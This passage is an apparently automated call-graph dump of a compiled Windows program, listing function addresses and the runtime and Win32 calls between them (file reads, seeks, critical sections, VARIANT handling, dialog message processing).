__tzset_nolock 86896->86897 86898 41aebc 86897->86898 86899 4182cb __lock 46 API calls 86897->86899 86900 41aec1 EnterCriticalSection 86898->86900 86901 41aede __tzset_nolock 86898->86901 86902 41ae8e 86899->86902 86900->86901 86901->86879 86903 41ae97 InitializeCriticalSectionAndSpinCount 86902->86903 86904 41aeaa 86902->86904 86903->86904 86905 41aeec ___lock_fhandle LeaveCriticalSection 86904->86905 86905->86898 86907 41aded __close_nolock 46 API calls 86906->86907 86908 41e18e 86907->86908 86909 41e1a4 SetFilePointer 86908->86909 86910 41e194 86908->86910 86912 41e1c3 86909->86912 86913 41e1bb GetLastError 86909->86913 86911 417f77 __lseeki64 46 API calls 86910->86911 86914 41e199 86911->86914 86912->86914 86915 417f9d __dosmaperr 46 API calls 86912->86915 86913->86912 86914->86885 86915->86914 86916->86870 86917->86876 86918->86874 86919->86878 86920->86876 86921->86886 86922->86885 86923->86876 86925 4149ea 86924->86925 86926 4149fe 86924->86926 86970 417f77 46 API calls __getptd_noexit 86925->86970 86927 4149fa 86926->86927 86929 41443c __flush 77 API calls 86926->86929 86942 414ab2 LeaveCriticalSection LeaveCriticalSection __wfsopen 86927->86942 86931 414a0a 86929->86931 86930 4149ef 86971 417f25 10 API calls __lseeki64 86930->86971 86943 41d8c2 86931->86943 86935 414139 __stbuf 46 API calls 86936 414a18 86935->86936 86947 41d7fe 86936->86947 86938 414a1e 86938->86927 86939 413748 _free 46 API calls 86938->86939 86939->86927 86940->86671 86941->86673 86942->86673 86944 414a12 86943->86944 86945 41d8d2 86943->86945 86944->86935 86945->86944 86946 413748 _free 46 API calls 86945->86946 86946->86944 86948 41d80a __tzset_nolock 86947->86948 86949 41d812 86948->86949 86950 41d82d 86948->86950 86987 417f8a 46 API calls __getptd_noexit 86949->86987 86951 41d839 86950->86951 86956 41d873 86950->86956 86989 417f8a 46 API calls __getptd_noexit 86951->86989 86954 41d817 86988 417f77 46 API calls __getptd_noexit 86954->86988 86955 41d83e 86990 417f77 46 API calls __getptd_noexit 86955->86990 86959 41ae56 ___lock_fhandle 48 API calls 86956->86959 86961 41d879 86959->86961 86960 41d846 86991 417f25 10 API calls __lseeki64 86960->86991 86963 41d893 86961->86963 86964 41d887 86961->86964 86992 417f77 46 API calls __getptd_noexit 86963->86992 86972 41d762 86964->86972 86967 41d88d 86993 41d8ba LeaveCriticalSection __unlock_fhandle 86967->86993 86968 41d81f __tzset_nolock 86968->86938 86970->86930 86971->86927 86994 41aded 86972->86994 86974 41d7c8 87007 41ad67 47 API calls __lseeki64 86974->87007 86976 41d772 86976->86974 86979 41aded __close_nolock 46 API calls 86976->86979 86986 41d7a6 86976->86986 86977 41aded __close_nolock 46 API calls 86980 41d7b2 CloseHandle 86977->86980 86978 41d7d0 86984 41d7f2 86978->86984 87008 417f9d 46 API calls 2 library calls 86978->87008 86981 41d79d 86979->86981 86980->86974 86982 41d7be GetLastError 86980->86982 86985 41aded __close_nolock 46 API calls 86981->86985 86982->86974 86984->86967 86985->86986 86986->86974 86986->86977 86987->86954 86988->86968 86989->86955 86990->86960 86991->86968 86992->86967 86993->86968 86995 41ae12 86994->86995 86996 41adfa 86994->86996 86998 417f8a __lseeki64 46 API calls 86995->86998 87001 41ae51 86995->87001 86997 417f8a __lseeki64 46 API calls 86996->86997 86999 41adff 86997->86999 87000 41ae23 86998->87000 87002 417f77 __lseeki64 46 API calls 86999->87002 87003 417f77 __lseeki64 46 API calls 87000->87003 87001->86976 87004 41ae07 87002->87004 87005 41ae2b 87003->87005 87004->86976 87006 417f25 __lseeki64 10 API calls 87005->87006 87006->87004 87007->86978 87008->86984 87010 414c82 __tzset_nolock 87009->87010 87011 414cc3 87010->87011 87012 414c96 setSBCS 87010->87012 87021 414cbb __tzset_nolock 87010->87021 87013 415471 __lock_file 47 API calls 87011->87013 87036 417f77 46 API calls __getptd_noexit 87012->87036 87014 414ccb 87013->87014 87022 414aba 87014->87022 87016 414cb0 87037 417f25 10 API calls __lseeki64 87016->87037 87021->86680 87023 414af2 87022->87023 87026 414ad8 setSBCS 87022->87026 87038 414cfa LeaveCriticalSection LeaveCriticalSection __wfsopen 87023->87038 87024 414ae2 87089 417f77 46 API calls __getptd_noexit 87024->87089 87026->87023 87026->87024 87029 414b2d 87026->87029 87029->87023 87030 414c38 setSBCS 87029->87030 87031 414139 __stbuf 46 API calls 87029->87031 87039 41dfcc 87029->87039 87069 41d8f3 87029->87069 87091 41e0c2 46 API calls 3 library calls 87029->87091 87092 417f77 46 API calls __getptd_noexit 87030->87092 87031->87029 87035 414ae7 87090 417f25 10 API calls __lseeki64 87035->87090 87036->87016 87037->87021 87038->87021 87040 41dfd8 __tzset_nolock 87039->87040 87041 41dfe0 87040->87041 87042 41dffb 87040->87042 87162 417f8a 46 API calls __getptd_noexit 87041->87162 87043 41e007 87042->87043 87048 41e041 87042->87048 87164 417f8a 46 API calls __getptd_noexit 87043->87164 87046 41dfe5 87163 417f77 46 API calls __getptd_noexit 87046->87163 87047 41e00c 87165 417f77 46 API calls __getptd_noexit 87047->87165 87051 41e063 87048->87051 87052 41e04e 87048->87052 87053 41ae56 ___lock_fhandle 48 API calls 87051->87053 87167 417f8a 46 API calls __getptd_noexit 87052->87167 87056 41e069 87053->87056 87054 41e014 87166 417f25 10 API calls __lseeki64 87054->87166 87058 41e077 87056->87058 87059 41e08b 87056->87059 87057 41e053 87168 417f77 46 API calls __getptd_noexit 87057->87168 87093 41da15 87058->87093 87169 417f77 46 API calls __getptd_noexit 87059->87169 87062 41dfed __tzset_nolock 87062->87029 87065 41e083 87171 41e0ba LeaveCriticalSection __unlock_fhandle 87065->87171 87066 41e090 87170 417f8a 46 API calls __getptd_noexit 87066->87170 87070 41d900 87069->87070 87074 41d915 87069->87074 87175 417f77 46 API calls __getptd_noexit 87070->87175 87072 41d905 87176 417f25 10 API calls __lseeki64 87072->87176 87075 41d94a 87074->87075 87080 41d910 87074->87080 87172 420603 87074->87172 87077 414139 __stbuf 46 API calls 87075->87077 87078 41d95e 87077->87078 87079 41dfcc __read 59 API calls 87078->87079 87081 41d965 87079->87081 87080->87029 87081->87080 87082 414139 __stbuf 46 API calls 87081->87082 87083 41d988 87082->87083 87083->87080 87084 414139 __stbuf 46 API calls 87083->87084 87085 41d994 87084->87085 87085->87080 87086 414139 __stbuf 46 API calls 87085->87086 87087 41d9a1 87086->87087 87088 414139 __stbuf 46 API calls 87087->87088 87088->87080 87089->87035 87090->87023 87091->87029 87092->87035 87094 41da31 87093->87094 87095 41da4c 87093->87095 87096 417f8a __lseeki64 46 API calls 87094->87096 87097 41da5b 87095->87097 87099 41da7a 87095->87099 87098 41da36 87096->87098 87100 417f8a __lseeki64 46 API calls 87097->87100 87101 417f77 __lseeki64 46 API calls 87098->87101 87103 41da98 87099->87103 87115 41daac 87099->87115 87102 41da60 87100->87102 87116 41da3e 87101->87116 87105 417f77 __lseeki64 46 API calls 87102->87105 87106 417f8a __lseeki64 46 API calls 87103->87106 87104 41db02 87109 417f8a __lseeki64 46 API calls 87104->87109 87108 41da67 87105->87108 87107 41da9d 87106->87107 87110 417f77 __lseeki64 46 API calls 87107->87110 87111 417f25 __lseeki64 10 API calls 87108->87111 87112 41db07 87109->87112 87114 41daa4 87110->87114 87111->87116 87113 417f77 __lseeki64 46 API calls 87112->87113 87113->87114 87118 417f25 __lseeki64 10 API calls 87114->87118 87115->87104 87115->87116 87117 41dae1 87115->87117 87119 41db1b 87115->87119 87116->87065 87117->87104 87122 41daec ReadFile 87117->87122 87118->87116 87121 416b04 __malloc_crt 46 API calls 87119->87121 87123 41db31 87121->87123 87124 41dc17 87122->87124 87125 41df8f GetLastError 87122->87125 87128 41db59 87123->87128 87129 41db3b 87123->87129 87124->87125 87130 41dc2b 87124->87130 87126 41de16 87125->87126 87127 41df9c 87125->87127 87137 417f9d __dosmaperr 46 API calls 87126->87137 87141 41dd9b 87126->87141 87132 417f77 __lseeki64 46 API calls 87127->87132 87131 420494 __lseeki64_nolock 48 API calls 87128->87131 87133 417f77 __lseeki64 46 API calls 87129->87133 87130->87141 87142 41dc47 87130->87142 87145 41de5b 87130->87145 87134 41db67 87131->87134 87135 41dfa1 87132->87135 87136 41db40 87133->87136 87134->87122 87138 417f8a __lseeki64 46 API calls 87135->87138 87139 417f8a __lseeki64 46 API calls 87136->87139 87137->87141 87138->87141 87139->87116 87140 413748 _free 46 API calls 87140->87116 87141->87116 87141->87140 87143 41dcab ReadFile 87142->87143 87150 41dd28 87142->87150 87146 41dcc9 GetLastError 87143->87146 87153 41dcd3 87143->87153 87144 41ded0 ReadFile 87147 41deef GetLastError 87144->87147 87154 41def9 87144->87154 87145->87141 87145->87144 87146->87142 87146->87153 87147->87145 87147->87154 87148 41ddec MultiByteToWideChar 87148->87141 87149 41de10 GetLastError 87148->87149 87149->87126 87150->87141 87151 41dda3 87150->87151 87152 41dd96 87150->87152 87156 41dd60 87150->87156 87151->87156 87157 41ddda 87151->87157 87155 417f77 __lseeki64 46 API calls 87152->87155 87153->87142 87158 420494 __lseeki64_nolock 48 API calls 87153->87158 87154->87145 87159 420494 __lseeki64_nolock 48 API calls 87154->87159 87155->87141 87156->87148 87160 420494 __lseeki64_nolock 48 API calls 87157->87160 87158->87153 87159->87154 87161 41dde9 87160->87161 87161->87148 87162->87046 87163->87062 87164->87047 87165->87054 87166->87062 87167->87057 87168->87054 87169->87066 87170->87065 87171->87062 87173 416b04 __malloc_crt 46 API calls 87172->87173 87174 420618 87173->87174 87174->87075 87175->87072 87176->87080 87180 4148b3 GetSystemTimeAsFileTime __aulldiv 87177->87180 87179 442c6b 87179->86683 87180->87179 87181->86690 87182->86696 87183->86696 87185 45272f __tzset_nolock _wcscpy 87184->87185 87186 414d04 61 API calls __fread_nolock 87185->87186 87187 44afef GetSystemTimeAsFileTime 87185->87187 87188 4528a4 87185->87188 87189 4150d1 81 API calls _fseek 87185->87189 87186->87185 87187->87185 87188->86605 87188->86606 87189->87185 87191 44b1bc 87190->87191 87192 44b1ca 87190->87192 87193 4149c2 116 API calls 87191->87193 87194 44b1e1 87192->87194 87195 44b1d8 87192->87195 87196 4149c2 116 API calls 87192->87196 87193->87192 87225 4321a4 87194->87225 87195->86632 87198 44b2db 87196->87198 87198->87194 87202 44b2e9 87198->87202 87199 44b224 87200 44b253 87199->87200 87201 44b228 87199->87201 87229 43213d 87200->87229 87204 44b235 87201->87204 87208 414a46 __fcloseall 82 API calls 87201->87208 87203 44b2f6 87202->87203 87205 414a46 __fcloseall 82 API calls 87202->87205 87203->86632 87209 44b245 87204->87209 87212 414a46 __fcloseall 82 API calls 87204->87212 87205->87203 87207 44b25a 87210 44b260 87207->87210 87211 44b289 87207->87211 87208->87204 87209->86632 87213 44b26d 87210->87213 87215 414a46 __fcloseall 82 API calls 87210->87215 87239 44b0bf 87 API calls 87211->87239 87212->87209 87216 44b27d 87213->87216 87218 414a46 __fcloseall 82 API calls 87213->87218 87215->87213 87216->86632 87217 44b28f 87240 4320f8 46 API calls _free 87217->87240 87218->87216 87220 44b295 87221 44b2a2 87220->87221 87222 414a46 __fcloseall 82 API calls 87220->87222 87223 44b2b2 87221->87223 87224 414a46 __fcloseall 82 API calls 87221->87224 87222->87221 87223->86632 87224->87223 87226 4321cb 87225->87226 87228 4321b4 __tzset_nolock _memmove 87225->87228 87227 414d04 __fread_nolock 61 API calls 87226->87227 87227->87228 87228->87199 87230 4135bb _malloc 46 API calls 87229->87230 87231 432150 87230->87231 87232 4135bb _malloc 46 API calls 87231->87232 87233 432162 87232->87233 87234 4135bb _malloc 46 API calls 87233->87234 87236 432174 87234->87236 87238 432189 87236->87238 87241 4320f8 46 API calls _free 87236->87241 87237 432198 87237->87207 87238->87207 87239->87217 87240->87220 87241->87237 87259 403ea0 52 API calls __cinit 87242->87259 87244 403e1d 87245 403e25 87244->87245 87247 428987 87244->87247 87246 4115d7 52 API calls 87245->87246 87250 403e34 87246->87250 87262 408e80 87247->87262 87249 403e44 87253 403e51 87249->87253 87260 403c30 52 API calls _memmove 87249->87260 87250->87249 87252 40bc70 52 API calls 87250->87252 87252->87249 87255 4115d7 52 API calls 87253->87255 87256 403e5e 87255->87256 87261 403da0 52 API calls 87256->87261 87258 403e82 87258->86535 87259->87244 87260->87253 87261->87258 87263 408e94 87262->87263 87264 408e88 87262->87264 87263->86535 87265 408f40 VariantClear 87264->87265 87265->87263 87266->86555 87267->86555 87268->86555 87269->86551 87270->86555 87271->86555 87272->86559 87273->86568 87274->86570 87275->86570 87325 410160 87276->87325 87278 41012f GetFullPathNameW 87279 410147 moneypunct 87278->87279 87279->86389 87281 4102cb SHGetDesktopFolder 87280->87281 87283 410333 _wcsncpy 87280->87283 87282 4102e0 _wcsncpy 87281->87282 87281->87283 87282->87283 87284 41031c SHGetPathFromIDListW 87282->87284 87283->86392 87284->87283 87286 4101bb 87285->87286 87290 425f4a 87285->87290 87287 410160 52 API calls 87286->87287 87289 4101c7 87287->87289 87288 4114ab __wcsicoll 58 API calls 87288->87290 87329 410200 52 API calls 2 library calls 87289->87329 87290->87288 87292 425f6e 87290->87292 87292->86394 87293 4101d6 87330 410200 52 API calls 2 library calls 87293->87330 87295 4101e9 87295->86394 87297 40f760 128 API calls 87296->87297 87298 40f584 87297->87298 87299 429335 87298->87299 87300 40f58c 87298->87300 87303 4528bd 118 API calls 87299->87303 87301 40f598 87300->87301 87302 429358 87300->87302 87355 4033c0 113 API calls 7 library calls 87301->87355 87356 434034 86 API calls _wprintf 87302->87356 87305 42934b 87303->87305 87308 429373 87305->87308 87309 42934f 87305->87309 87307 40f5b4 87307->86390 87311 4115d7 52 API calls 87308->87311 87312 431e58 82 API calls 87309->87312 87310 429369 87310->87308 87319 4293c5 moneypunct 87311->87319 87312->87302 87313 42959c 87314 413748 _free 46 API calls 87313->87314 87315 4295a5 87314->87315 87316 431e58 82 API calls 87315->87316 87317 4295b1 87316->87317 87319->87313 87322 401b10 52 API calls 87319->87322 87331 444af8 87319->87331 87334 44b41c 87319->87334 87341 402780 87319->87341 87349 4022d0 87319->87349 87357 44c7dd 64 API calls 3 library calls 87319->87357 87322->87319 87326 410167 _wcslen 87325->87326 87327 4115d7 52 API calls 87326->87327 87328 41017e _wcscpy 87327->87328 87328->87278 87329->87293 87330->87295 87332 4115d7 52 API calls 87331->87332 87333 444b27 _memmove 87332->87333 87333->87319 87335 44b429 87334->87335 87336 4115d7 52 API calls 87335->87336 87337 44b440 87336->87337 87338 44b45e 87337->87338 87339 401b10 52 API calls 87337->87339 87338->87319 87340 44b453 87339->87340 87340->87319 87342 402827 87341->87342 87348 402790 moneypunct _memmove 87341->87348 87345 4115d7 52 API calls 87342->87345 87343 4115d7 52 API calls 87346 402797 87343->87346 87344 4027bd 87344->87319 87345->87348 87346->87344 87347 4115d7 52 API calls 87346->87347 87347->87344 87348->87343 87350 4022e0 87349->87350 87352 40239d 87349->87352 87351 4115d7 52 API calls 87350->87351 87350->87352 87353 402320 moneypunct 87350->87353 87351->87353 87352->87319 87353->87352 87354 4115d7 52 API calls 87353->87354 87354->87353 87355->87307 87356->87310 87357->87319 87359 402417 87358->87359 87360 402539 moneypunct 87358->87360 87359->87360 87361 4115d7 52 API calls 87359->87361 87360->86398 87362 402443 87361->87362 87363 4115d7 52 API calls 87362->87363 87364 4024b4 87363->87364 87364->87360 87366 4022d0 52 API calls 87364->87366 87387 402880 87364->87387 87366->87364 87372 401566 87367->87372 87368 401794 87439 40e9a0 90 API calls 87368->87439 87371 4010a0 52 API calls 87371->87372 87372->87368 87372->87371 87373 40167a 87372->87373 87374 4017c0 87373->87374 87440 45e737 90 API calls 3 library calls 87373->87440 87374->86400 87376 40bc70 52 API calls 87375->87376 87385 40d451 87376->87385 87377 40d50f 87444 410600 52 API calls 87377->87444 87379 427c01 87445 45e737 90 API calls 3 library calls 87379->87445 87382 401b10 52 API calls 87382->87385 87383 40d519 87383->86403 87385->87377 87385->87379 87385->87382 87385->87383 87441 40e0a0 52 API calls 87385->87441 87442 40f310 53 API calls 87385->87442 87443 40d860 91 API calls 87385->87443 87388 4115d7 52 API calls 87387->87388 87389 4028b3 87388->87389 87390 4115d7 52 API calls 87389->87390 87401 4028c5 moneypunct _memmove 87390->87401 87391 402780 52 API calls 87392 402b1e moneypunct 87391->87392 87392->87364 87393 427d62 87397 403350 52 API calls 87393->87397 87395 42802b moneypunct 87396 402aeb moneypunct 87396->87391 87396->87395 87400 427d6b 87397->87400 87398 402bb6 87430 403060 53 API calls 87398->87430 87412 427f2c 87400->87412 87433 403020 52 API calls _memmove 87400->87433 87401->87393 87401->87396 87401->87398 87405 403350 52 API calls 87401->87405 87411 427fd5 87401->87411 87401->87412 87413 402780 52 API calls 87401->87413 87416 427fa5 87401->87416 87417 402f00 52 API calls 87401->87417 87420 428000 87401->87420 87422 4026f0 52 API calls 87401->87422 87428 4115d7 52 API calls 87401->87428 87429 4031b0 63 API calls 87401->87429 87431 402f80 92 API calls _memmove 87401->87431 87432 402280 52 API calls 87401->87432 87434 4013a0 52 API calls 87401->87434 87402 402bca 87403 427f63 87402->87403 87404 402bd4 87402->87404 87436 460879 92 API calls 3 library calls 87403->87436 87406 402780 52 API calls 87404->87406 87405->87401 87409 402bdf 87406->87409 87409->87364 87437 460879 92 API calls 3 library calls 87411->87437 87435 460879 92 API calls 3 library calls 87412->87435 87413->87401 87424 402780 52 API calls 87416->87424 87417->87401 87419 427fe4 87423 402780 52 API calls 87419->87423 87438 460879 92 API calls 3 library calls 87420->87438 87427 402a85 CharUpperBuffW 87422->87427 87426 427f48 87423->87426 87424->87392 87426->87392 87427->87401 87428->87401 87429->87401 87430->87402 87431->87401 87432->87401 87433->87400 87434->87401 87435->87426 87436->87426 87437->87419 87438->87392 87439->87373 87440->87374 87441->87385 87442->87385 87443->87385 87444->87383 87445->87383 87446->86416 87447->86417 87449 42c5fe 87448->87449 87464 4091c6 87448->87464 87450 40bc70 52 API calls 87449->87450 87449->87464 87451 42c64e InterlockedIncrement 87450->87451 87452 42c665 87451->87452 87458 42c697 87451->87458 87454 42c672 InterlockedDecrement Sleep InterlockedIncrement 87452->87454 87452->87458 87453 42c737 InterlockedDecrement 87455 42c74a 87453->87455 87454->87452 87454->87458 87457 408f40 VariantClear 87455->87457 87456 42c731 87456->87453 87459 42c752 87457->87459 87458->87453 87458->87456 87460 408e80 VariantClear 87458->87460 87751 410c60 VariantClear moneypunct 87459->87751 87461 42c6cf 87460->87461 87742 45340c 87461->87742 87464->86476 87465 42c6db 87466 402160 52 API calls 87465->87466 87467 42c6e5 87466->87467 87468 45340c 85 API calls 87467->87468 87469 42c6f1 87468->87469 87748 40d200 52 API calls 2 library calls 87469->87748 87471 42c6fb 87749 465124 53 API calls 87471->87749 87473 42c715 87474 42c76a 87473->87474 87475 42c719 87473->87475 87476 401b10 52 API calls 87474->87476 87750 46fe32 VariantClear 87475->87750 87478 42c77e 87476->87478 87479 401980 53 API calls 87478->87479 87485 42c796 87479->87485 87480 42c812 87753 46fe32 VariantClear 87480->87753 87482 42c82a InterlockedDecrement 87754 46ff07 54 API calls 87482->87754 87484 42c864 87755 45e737 90 API calls 3 library calls 87484->87755 87485->87480 87485->87484 87752 40ba10 52 API calls 2 library calls 87485->87752 87496 408f40 VariantClear 87503 42c874 87503->87496 87505 42ca59 87503->87505 87505->87505 87507 40afc4 87506->87507 87508 40b156 87506->87508 87509 40afd5 87507->87509 87510 42d1e3 87507->87510 87810 45e737 90 API calls 3 library calls 87508->87810 87513 40a780 199 API calls 87509->87513 87531 40b11a moneypunct 87509->87531 87811 45e737 90 API calls 3 library calls 87510->87811 87516 40b00a 87513->87516 87514 42d1f8 87519 408f40 VariantClear 87514->87519 87515 40b143 87515->86476 87516->87514 87520 40b012 87516->87520 87518 42d4db 87518->87518 87519->87515 87521 40b04a 87520->87521 87522 42d231 VariantClear 87520->87522 87524 40b094 moneypunct 87520->87524 87525 40b05c moneypunct 87521->87525 87812 40e270 VariantClear moneypunct 87521->87812 87522->87525 87523 40b108 87523->87531 87813 40e270 VariantClear moneypunct 87523->87813 87524->87523 87527 42d425 moneypunct 87524->87527 87525->87524 87530 4115d7 52 API calls 87525->87530 87526 42d45a VariantClear 87526->87531 87527->87526 87527->87531 87530->87524 87531->87515 87814 45e737 90 API calls 3 library calls 87531->87814 87533 4096c6 _wcslen 87532->87533 87534 4115d7 52 API calls 87533->87534 87598 40a70c moneypunct _memmove 87533->87598 87535 4096fa _memmove 87534->87535 87537 4115d7 52 API calls 87535->87537 87538 40971b 87537->87538 87540 409749 CharUpperBuffW 87538->87540 87543 40976a moneypunct 87538->87543 87538->87598 87539 4297aa 87541 4115d7 52 API calls 87539->87541 87540->87543 87583 4297d1 _memmove 87541->87583 87580 4097e5 moneypunct 87543->87580 87817 47dcbb 201 API calls 87543->87817 87545 408f40 VariantClear 87546 42ae92 87545->87546 87844 410c60 VariantClear moneypunct 87546->87844 87548 42aea4 87549 409aa2 87551 4115d7 52 API calls 87549->87551 87556 409afe 87549->87556 87549->87583 87550 40a689 87553 4115d7 52 API calls 87550->87553 87551->87556 87552 4115d7 52 API calls 87552->87580 87571 40a6af moneypunct _memmove 87553->87571 87554 409b2a 87558 429dbe 87554->87558 87607 409b4d moneypunct _memmove 87554->87607 87826 40b400 VariantClear VariantClear moneypunct 87554->87826 87555 40c2c0 52 API calls 87555->87580 87556->87554 87557 4115d7 52 API calls 87556->87557 87559 429d31 87557->87559 87563 429dd3 87558->87563 87827 40b400 VariantClear VariantClear moneypunct 87558->87827 87562 429d42 87559->87562 87822 44a801 52 API calls 87559->87822 87560 429a46 VariantClear 87560->87580 87823 40e0a0 52 API calls 87562->87823 87563->87607 87828 40e1c0 VariantClear moneypunct 87563->87828 87564 408f40 VariantClear 87564->87580 87567 40a045 87573 4115d7 52 API calls 87567->87573 87568 42a3f5 87830 47390f VariantClear 87568->87830 87579 4115d7 52 API calls 87571->87579 87581 40a04c 87573->87581 87575 429d57 87824 453443 52 API calls 87575->87824 87577 42a42f 87831 45e737 90 API calls 3 library calls 87577->87831 87579->87598 87580->87549 87580->87550 87580->87552 87580->87555 87580->87560 87580->87564 87580->87571 87580->87583 87584 4299d9 87580->87584 87587 429abd 87580->87587 87595 40a780 199 API calls 87580->87595 87596 42a452 87580->87596 87818 40c4e0 199 API calls 87580->87818 87820 40ba10 52 API calls 2 library calls 87580->87820 87821 40e270 VariantClear moneypunct 87580->87821 87582 40a0a7 87581->87582 87586 4091e0 322 API calls 87581->87586 87605 40a0af 87582->87605 87832 40c790 VariantClear moneypunct 87582->87832 87843 45e737 90 API calls 3 library calls 87583->87843 87588 408f40 VariantClear 87584->87588 87586->87582 87587->86476 87590 4299e2 87588->87590 87589 429d88 87825 453443 52 API calls 87589->87825 87819 410c60 VariantClear moneypunct 87590->87819 87593 403e10 53 API calls 87593->87607 87595->87580 87596->87545 87816 4013a0 52 API calls 87598->87816 87599 4115d7 52 API calls 87599->87607 87601 44a801 52 API calls 87601->87607 87602 40a650 moneypunct 87602->86476 87603 408f40 VariantClear 87634 40a162 moneypunct _memmove 87603->87634 87604 402780 52 API calls 87604->87607 87606 40a11b 87605->87606 87608 42a4b4 VariantClear 87605->87608 87605->87634 87610 40a12d moneypunct 87606->87610 87833 40e270 VariantClear moneypunct 87606->87833 87607->87568 87607->87577 87607->87593 87607->87598 87607->87599 87607->87601 87607->87604 87609 40a780 199 API calls 87607->87609 87612 401980 53 API calls 87607->87612 87613 408e80 VariantClear 87607->87613 87615 409c95 87607->87615 87619 41130a 51 API calls __cinit 87607->87619 87623 409fd2 87607->87623 87829 45f508 52 API calls 87607->87829 87608->87610 87609->87607 87614 4115d7 52 API calls 87610->87614 87610->87634 87612->87607 87613->87607 87614->87634 87615->86476 87616 408e80 VariantClear 87616->87634 87618 42a74d VariantClear 87618->87634 87619->87607 87620 40a368 87622 42aad4 87620->87622 87628 40a397 87620->87628 87621 40e270 VariantClear 87621->87634 87836 46fe90 VariantClear VariantClear moneypunct 87622->87836 87623->87567 87623->87568 87624 42a7e4 VariantClear 87624->87634 87625 42a886 VariantClear 87625->87634 87627 40a3ce 87638 40a3d9 moneypunct 87627->87638 87837 40b400 VariantClear VariantClear moneypunct 87627->87837 87628->87627 87653 40a42c moneypunct 87628->87653 87815 40b400 VariantClear VariantClear moneypunct 87628->87815 87631 4115d7 52 API calls 87631->87634 87632 42abaf 87637 42abd4 VariantClear 87632->87637 87646 40a4ee moneypunct 87632->87646 87633 4115d7 52 API calls 87636 42a5a6 VariantInit VariantCopy 87633->87636 87634->87603 87634->87616 87634->87618 87634->87620 87634->87621 87634->87622 87634->87624 87634->87625 87634->87631 87634->87633 87834 470870 52 API calls 87634->87834 87835 44ccf1 VariantClear moneypunct 87634->87835 87635 40a4dc 87635->87646 87839 40e270 VariantClear moneypunct 87635->87839 87636->87634 87640 42a5c6 VariantClear 87636->87640 87637->87646 87639 40a41a 87638->87639 87645 42ab44 VariantClear 87638->87645 87638->87653 87639->87653 87838 40e270 VariantClear moneypunct 87639->87838 87640->87634 87641 42ac4f 87647 42ac79 VariantClear 87641->87647 87651 40a546 moneypunct 87641->87651 87644 40a534 87644->87651 87840 40e270 VariantClear moneypunct 87644->87840 87645->87653 87646->87641 87646->87644 87647->87651 87648 42ad28 87654 42ad4e VariantClear 87648->87654 87657 40a583 moneypunct 87648->87657 87651->87648 87652 40a571 87651->87652 87652->87657 87841 40e270 VariantClear moneypunct 87652->87841 87653->87632 87653->87635 87654->87657 87657->87602 87660 408fff 87659->87660 87671 40900d 87659->87671 87845 403ea0 52 API calls __cinit 87660->87845 87663 42c3f6 87847 45e737 90 API calls 3 library calls 87663->87847 87665 40a780 199 API calls 87665->87671 87666 42c44a 87849 45e737 90 API calls 3 library calls 87666->87849 87667 42c47b 87850 451b42 61 API calls 87667->87850 87670 42c564 87676 408f40 VariantClear 87670->87676 87671->87663 87671->87665 87671->87666 87671->87667 87671->87670 87673 42c4cb 87671->87673 87675 42c548 87671->87675 87679 409112 87671->87679 87681 4090df 87671->87681 87683 42c528 87671->87683 87685 4090ea 87671->87685 87689 4090f2 moneypunct 87671->87689 87846 4534e3 52 API calls 87671->87846 87848 40c4e0 199 API calls 87671->87848 87852 47faae 238 API calls 87673->87852 87855 45e737 90 API calls 3 library calls 87675->87855 87676->87689 87677 42c491 87677->87689 87851 45e737 90 API calls 3 library calls 87677->87851 87678 42c4da 87678->87689 87853 45e737 90 API calls 3 library calls 87678->87853 87679->87675 87688 40912b 87679->87688 87681->87685 87686 408e80 VariantClear 87681->87686 87854 45e737 90 API calls 3 library calls 87683->87854 87690 408f40 VariantClear 87685->87690 87686->87685 87688->87689 87691 403e10 53 API calls 87688->87691 87689->86476 87690->87689 87692 40914b 87691->87692 87693 408f40 VariantClear 87692->87693 87693->87689 87856 408d90 87694->87856 87696 429778 87884 410c60 VariantClear moneypunct 87696->87884 87698 408cf9 87698->87696 87700 42976c 87698->87700 87702 408d2d 87698->87702 87699 429780 87883 45e737 90 API calls 3 library calls 87700->87883 87872 403d10 87702->87872 87705 408d71 moneypunct 87705->86476 87706 408f40 VariantClear 87707 408d45 moneypunct 87706->87707 87707->87705 87707->87706 87709 425c87 87708->87709 87712 40d15f 87708->87712 87710 425cc7 87709->87710 87711 425ca1 TranslateAcceleratorW 87709->87711 87711->87712 87712->86476 87714 42602f 87713->87714 87717 40d17f 87713->87717 87714->86476 87715 40d18c 87715->86476 87716 42608e IsDialogMessageW 87716->87715 87716->87717 87717->87715 87717->87716 88170 430c46 GetClassLongW 87717->88170 87719->86476 87720->86426 87721->86432 87722->86476 87723->86476 87724->86476 87725->86476 87726->86476 87727->86484 87728->86484 87729->86484 87730->86484 87731->86484 87732->86484 87733->86484 87735 403cdf 87734->87735 87736 408f40 VariantClear 87735->87736 87737 403ce7 87736->87737 87737->86471 87738->86484 87739->86484 87740->86476 87741->86439 87743 453439 87742->87743 87744 453419 87742->87744 87743->87465 87745 45342f 87744->87745 87800 4531b1 85 API calls 5 library calls 87744->87800 87745->87465 87747 453425 87747->87465 87748->87471 87749->87473 87750->87456 87751->87464 87752->87485 87753->87482 87755->87503 87800->87747 87810->87510 87811->87514 87812->87525 87813->87531 87814->87518 87815->87627 87816->87539 87817->87543 87818->87580 87819->87602 87820->87580 87821->87580 87822->87562 87823->87575 87824->87589 87825->87554 87826->87558 87827->87563 87828->87607 87829->87607 87830->87577 87831->87596 87832->87582 87833->87610 87834->87634 87835->87634 87836->87627 87837->87638 87838->87653 87839->87646 87840->87651 87841->87657 87843->87596 87844->87548 87845->87671 87846->87671 87847->87689 87848->87671 87849->87689 87850->87677 87851->87689 87852->87678 87853->87689 87854->87689 87855->87670 87857 4289d2 87856->87857 87858 408db3 87856->87858 87887 45e737 90 API calls 3 library calls 87857->87887 87885 40bec0 90 API calls 87858->87885 87861 4289e5 87888 45e737 90 API calls 3 library calls 87861->87888 87862 408e5a 87862->87698 87865 428a05 87867 408f40 VariantClear 87865->87867 87866 408dc9 87866->87861 87866->87862 87866->87865 87868 40a780 199 API calls 87866->87868 87869 408e64 87866->87869 87871 408f40 VariantClear 87866->87871 87886 40ba10 52 API calls 2 library calls 87866->87886 87867->87862 87868->87866 87870 408f40 VariantClear 87869->87870 87870->87862 87871->87866 87873 408f40 VariantClear 87872->87873 87874 403d20 87873->87874 87875 403cd0 VariantClear 87874->87875 87876 403d4d 87875->87876 87889 45e17d 87876->87889 87899 4755ad 87876->87899 87902 467897 87876->87902 87946 4813fa 87876->87946 87956 46e91c 87876->87956 87877 403d76 87877->87696 87877->87707 87883->87696 87884->87699 87885->87866 87886->87866 87887->87861 87888->87865 87890 45e198 87889->87890 87891 45e19c 87890->87891 87892 45e1b8 